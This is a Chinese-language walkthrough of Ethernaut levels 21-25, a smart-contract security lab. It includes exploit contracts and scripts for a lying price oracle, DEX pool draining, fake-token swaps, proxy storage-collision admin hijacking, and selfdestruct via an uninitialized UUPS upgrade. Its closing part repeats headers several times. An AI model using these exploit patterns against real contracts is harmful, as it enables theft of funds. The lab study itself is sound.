Ethernaut 21-25 关卡详解教学文档<\/h1>

第21关：Shop 价格操纵<\/h2>

关卡描述<\/h3>
目标是以低于要求的价格从商店购买商品。<\/p>

关键知识点<\/h3>

view<\/code> 函数限制：承诺不修改状态的函数<\/li>

被视为修改状态的操作：

写入状态变量<\/li>
发出事件<\/li>
创建合约<\/li>
使用 selfdestruct<\/code><\/li>
发送以太币<\/li>
调用非 view\/pure<\/code> 函数<\/li>
使用低级调用<\/li>
特定操作码的内联汇编<\/li>
<\/ol>
<\/li>
<\/ul>
漏洞分析<\/h3>

商店合约调用了 _buyer.price()<\/code> 两次<\/li>
isSold<\/code> 是公开变量<\/li>
攻击思路：

第一次调用返回高价满足条件<\/li>
第二次调用返回低价完成交易<\/li>
<\/ol>
<\/li>
<\/ul>
攻击步骤<\/h3>

实现 Buyer<\/code> 合约的 price()<\/code> 函数<\/li>
第一次调用返回 100（满足条件）<\/li>
第二次调用返回 0（实际支付）<\/li>
<\/ol>
攻击合约示例<\/h3>
contract<\/span> Exploit<\/span> {
<\/span><\/span>    Shop shop;
<\/span><\/span>    
<\/span><\/span>    constructor<\/span>(address<\/span> _shop) {
<\/span><\/span>        shop =<\/span> Shop(_shop);
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    function<\/span> attack<\/span>() public<\/span> {
<\/span><\/span>        shop.buy();
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    function<\/span> price<\/span>() external<\/span> view<\/span> returns<\/span> (uint<\/span>) {
<\/span><\/span>        return<\/span> shop.isSold() ?<\/span> 0<\/span> :<\/span> 100<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>第22关：Dex 价格操纵<\/h2>
关卡描述<\/h3>
通过操纵代币价格从合约中窃取资金。<\/p>
初始状态<\/h3>

玩家：10 token1 和 10 token2<\/li>
合约：100 token1 和 100 token2<\/li>
<\/ul>
漏洞分析<\/h3>

兑换价格由池子余额比例决定：amount * to_balance \/ from_balance<\/code><\/li>
通过大额交换可以操纵价格比例<\/li>
<\/ul>
攻击步骤<\/h3>

授权合约使用你的代币<\/li>
执行以下交换序列：

用全部 token1 换 token2<\/li>
用全部 token2 换 token1<\/li>
重复直到耗尽一个池子<\/li>
<\/ul>
<\/li>
<\/ol>
攻击脚本示例<\/h3>
\/\/ 授权
<\/span><\/span><\/span><\/span>await<\/span> contract<\/span>.approve<\/span>(contract<\/span>.address<\/span>, 1000<\/span>);
<\/span><\/span>
<\/span><\/span>\/\/ 交换序列
<\/span><\/span><\/span><\/span>await<\/span> contract<\/span>.swap<\/span>(token1<\/span>, token2<\/span>, 10<\/span>);
<\/span><\/span>await<\/span> contract<\/span>.swap<\/span>(token2<\/span>, token1<\/span>, 20<\/span>);
<\/span><\/span>await<\/span> contract<\/span>.swap<\/span>(token1<\/span>, token2<\/span>, 24<\/span>);
<\/span><\/span>await<\/span> contract<\/span>.swap<\/span>(token2<\/span>, token1<\/span>, 30<\/span>);
<\/span><\/span>await<\/span> contract<\/span>.swap<\/span>(token1<\/span>, token2<\/span>, 41<\/span>);
<\/span><\/span>await<\/span> contract<\/span>.swap<\/span>(token2<\/span>, token1<\/span>, 45<\/span>);
<\/span><\/span><\/code><\/pre>第23关：DexTwo 攻击<\/h2>
关卡描述<\/h3>
与第22关类似，但修改了交换逻辑，需要耗尽两个代币池。<\/p>
关键修改<\/h3>

移除了 require(from != token1 && from != token2)<\/code><\/li>
<\/ul>
攻击思路<\/h3>

部署自定义代币<\/li>
向合约转入自定义代币<\/li>
用自定义代币交换 token1 和 token2<\/li>
<\/ol>
攻击步骤<\/h3>

部署攻击代币合约<\/li>
向Dex合约转入100个攻击代币<\/li>
用攻击代币交换token1和token2<\/li>
<\/ol>
攻击合约示例<\/h3>
contract<\/span> AttackToken<\/span> {
<\/span><\/span>    function<\/span> approve<\/span>(address<\/span> spender, uint256<\/span> amount) public<\/span> returns<\/span> (bool<\/span>) {
<\/span><\/span>        return<\/span> true<\/span>;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    function<\/span> transfer<\/span>(address<\/span> to, uint256<\/span> amount) public<\/span> returns<\/span> (bool<\/span>) {
<\/span><\/span>        return<\/span> true<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>第24关：代理合约攻击<\/h2>
关卡描述<\/h3>
劫持钱包，成为代理管理员。<\/p>
前置知识<\/h3>

代理模式<\/strong>：存储层(Proxy) + 逻辑层(Implementation)<\/li>
delegatecall<\/strong>：使用目标合约代码但保持调用者存储<\/li>
存储冲突<\/strong>：变量按存储槽而非名称访问<\/li>
<\/ul>
漏洞分析<\/h3>

Proxy和Wallet共享存储但变量顺序不同：

Proxy的pendingAdmin<\/code>(slot0) = Wallet的owner<\/code><\/li>
Proxy的admin<\/code>(slot1) = Wallet的maxBalance<\/code><\/li>
<\/ul>
<\/li>
可以通过Wallet函数修改Proxy的存储<\/li>
<\/ul>
攻击步骤<\/h3>

调用proposeNewAdmin<\/code>成为pendingAdmin<\/code><\/li>
添加攻击合约到白名单<\/li>
通过嵌套multicall<\/code>多次调用deposit<\/code><\/li>
执行取款操作<\/li>
调用setMaxBalance<\/code>劫持admin<\/li>
<\/ol>
攻击合约示例<\/h3>
contract<\/span> Exploit<\/span> {
<\/span><\/span>    PuzzleProxy proxy;
<\/span><\/span>    
<\/span><\/span>    constructor<\/span>(address<\/span> _proxy) {
<\/span><\/span>        proxy =<\/span> PuzzleProxy(_proxy);
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    function<\/span> attack<\/span>() public<\/span> payable<\/span> {
<\/span><\/span>        \/\/ 1. 成为pendingAdmin
<\/span><\/span><\/span><\/span>        proxy.proposeNewAdmin(address<\/span>(this));
<\/span><\/span>        
<\/span><\/span>        \/\/ 2. 添加到白名单
<\/span><\/span><\/span><\/span>        PuzzleWallet(address<\/span>(proxy)).addToWhitelist(address<\/span>(this));
<\/span><\/span>        
<\/span><\/span>        \/\/ 3. 嵌套multicall攻击
<\/span><\/span><\/span><\/span>        bytes<\/span>[] memory<\/span> depositData =<\/span> new<\/span> bytes<\/span>[](1<\/span>);
<\/span><\/span>        depositData[0<\/span>] =<\/span> abi.encodeWithSignature("deposit()"<\/span>);
<\/span><\/span>        
<\/span><\/span>        bytes<\/span>[] memory<\/span> multicallData =<\/span> new<\/span> bytes<\/span>[](2<\/span>);
<\/span><\/span>        multicallData[0<\/span>] =<\/span> abi.encodeWithSignature("deposit()"<\/span>);
<\/span><\/span>        multicallData[1<\/span>] =<\/span> abi.encodeWithSignature("multicall(bytes[])"<\/span>, depositData);
<\/span><\/span>        
<\/span><\/span>        PuzzleWallet(address<\/span>(proxy)).multicall{value:<\/span> msg.value}(multicallData);
<\/span><\/span>        
<\/span><\/span>        \/\/ 4. 取款
<\/span><\/span><\/span><\/span>        PuzzleWallet(address<\/span>(proxy)).execute(msg.sender, 2<\/span>*<\/span>msg.value, ""<\/span>);
<\/span><\/span>        
<\/span><\/span>        \/\/ 5. 劫持admin
<\/span><\/span><\/span><\/span>        PuzzleWallet(address<\/span>(proxy)).setMaxBalance(uint256<\/span>(uint160<\/span>(msg.sender)));
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>第25关：可升级合约攻击<\/h2>
关卡描述<\/h3>
自毁引擎合约使摩托车无法使用。<\/p>
前置知识<\/h3>

UUPS代理<\/strong>：升级逻辑放在实现合约中<\/li>
ERC1967<\/strong>：标准化的代理存储槽<\/li>
Initializable<\/strong>：可初始化合约模式<\/li>
<\/ul>
漏洞分析<\/h3>

实现合约的initialize()<\/code>未被调用<\/li>
可以直接调用并成为upgrader<\/code><\/li>
然后可以调用upgradeToAndCall<\/code>部署自毁合约<\/li>
<\/ul>
攻击步骤<\/h3>

直接调用Engine<\/code>的initialize()<\/code><\/li>
部署自毁合约<\/li>
调用upgradeToAndCall<\/code>指向自毁合约<\/li>
<\/ol>
攻击合约示例<\/h3>
contract<\/span> SelfDestruct<\/span> {
<\/span><\/span>    constructor<\/span>() payable<\/span> {}
<\/span><\/span>    
<\/span><\/span>    function<\/span> destroy<\/span>() public<\/span> {
<\/span><\/span>        selfdestruct(payable<\/span>(msg.sender));
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>contract<\/span> Exploit<\/span> {
<\/span><\/span>    function<\/span> attack<\/span>(address<\/span> engine) public<\/span> {
<\/span><\/span>        \/\/ 1. 初始化成为upgrader
<\/span><\/span><\/span><\/span>        Engine(engine).initialize();
<\/span><\/span>        
<\/span><\/span>        \/\/ 2. 部署自毁合约
<\/span><\/span><\/span><\/span>        SelfDestruct destruct =<\/span> new<\/span> SelfDestruct{value:<\/span> 0<\/span>.001<\/span> ether<\/span>}();
<\/span><\/span>        
<\/span><\/span>        \/\/ 3. 升级并自毁
<\/span><\/span><\/span><\/span>        Engine(engine).upgradeToAndCall(
<\/span><\/span>            address<\/span>(destruct),
<\/span><\/span>            abi.encodeWithSignature("destroy()"<\/span>)
<\/span><\/span>        );
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>总结<\/h2>
这五个关卡涵盖了以太坊智能合约安全的多个重要方面：<\/p>

View函数滥用<\/strong>：利用view函数的限制不严格进行状态修改<\/li>
DEX价格操纵<\/strong>：通过大额交易操纵价格机制<\/li>
自定义代币攻击<\/strong>：利用合约对代币验证不足<\/li>
代理合约存储冲突<\/strong>：利用delegatecall和存储布局问题<\/li>
UUPS代理漏洞<\/strong>：未初始化的可升级合约风险<\/li>
<\/ol>
每个关卡都展示了智能合约开发中常见的安全隐患，理解这些漏洞有助于开发更安全的合约系统。<\/p>

Ethernaut 21-25 关卡详解教学文档<\/h1>

第21关：Shop 价格操纵<\/h2>

关卡描述<\/h3> 目标是以低于要求的价格从商店购买商品。<\/p>

第22关：Dex 价格操纵<\/h2>

关卡描述<\/h3> 通过操纵代币价格从合约中窃取资金。<\/p>

第23关：DexTwo 攻击<\/h2>

关卡描述<\/h3> 与第22关类似，但修改了交换逻辑，需要耗尽两个代币池。<\/p>

第24关：代理合约攻击<\/h2>

关卡描述<\/h3> 劫持钱包，成为代理管理员。<\/p>

第25关：可升级合约攻击<\/h2>

关卡描述<\/h3> 自毁引擎合约使摩托车无法使用。<\/p>

关卡描述<\/h3>
目标是以低于要求的价格从商店购买商品。<\/p>

关卡描述<\/h3>
通过操纵代币价格从合约中窃取资金。<\/p>

关卡描述<\/h3>
与第22关类似，但修改了交换逻辑，需要耗尽两个代币池。<\/p>

关卡描述<\/h3>
劫持钱包，成为代理管理员。<\/p>

关卡描述<\/h3>
自毁引擎合约使摩托车无法使用。<\/p>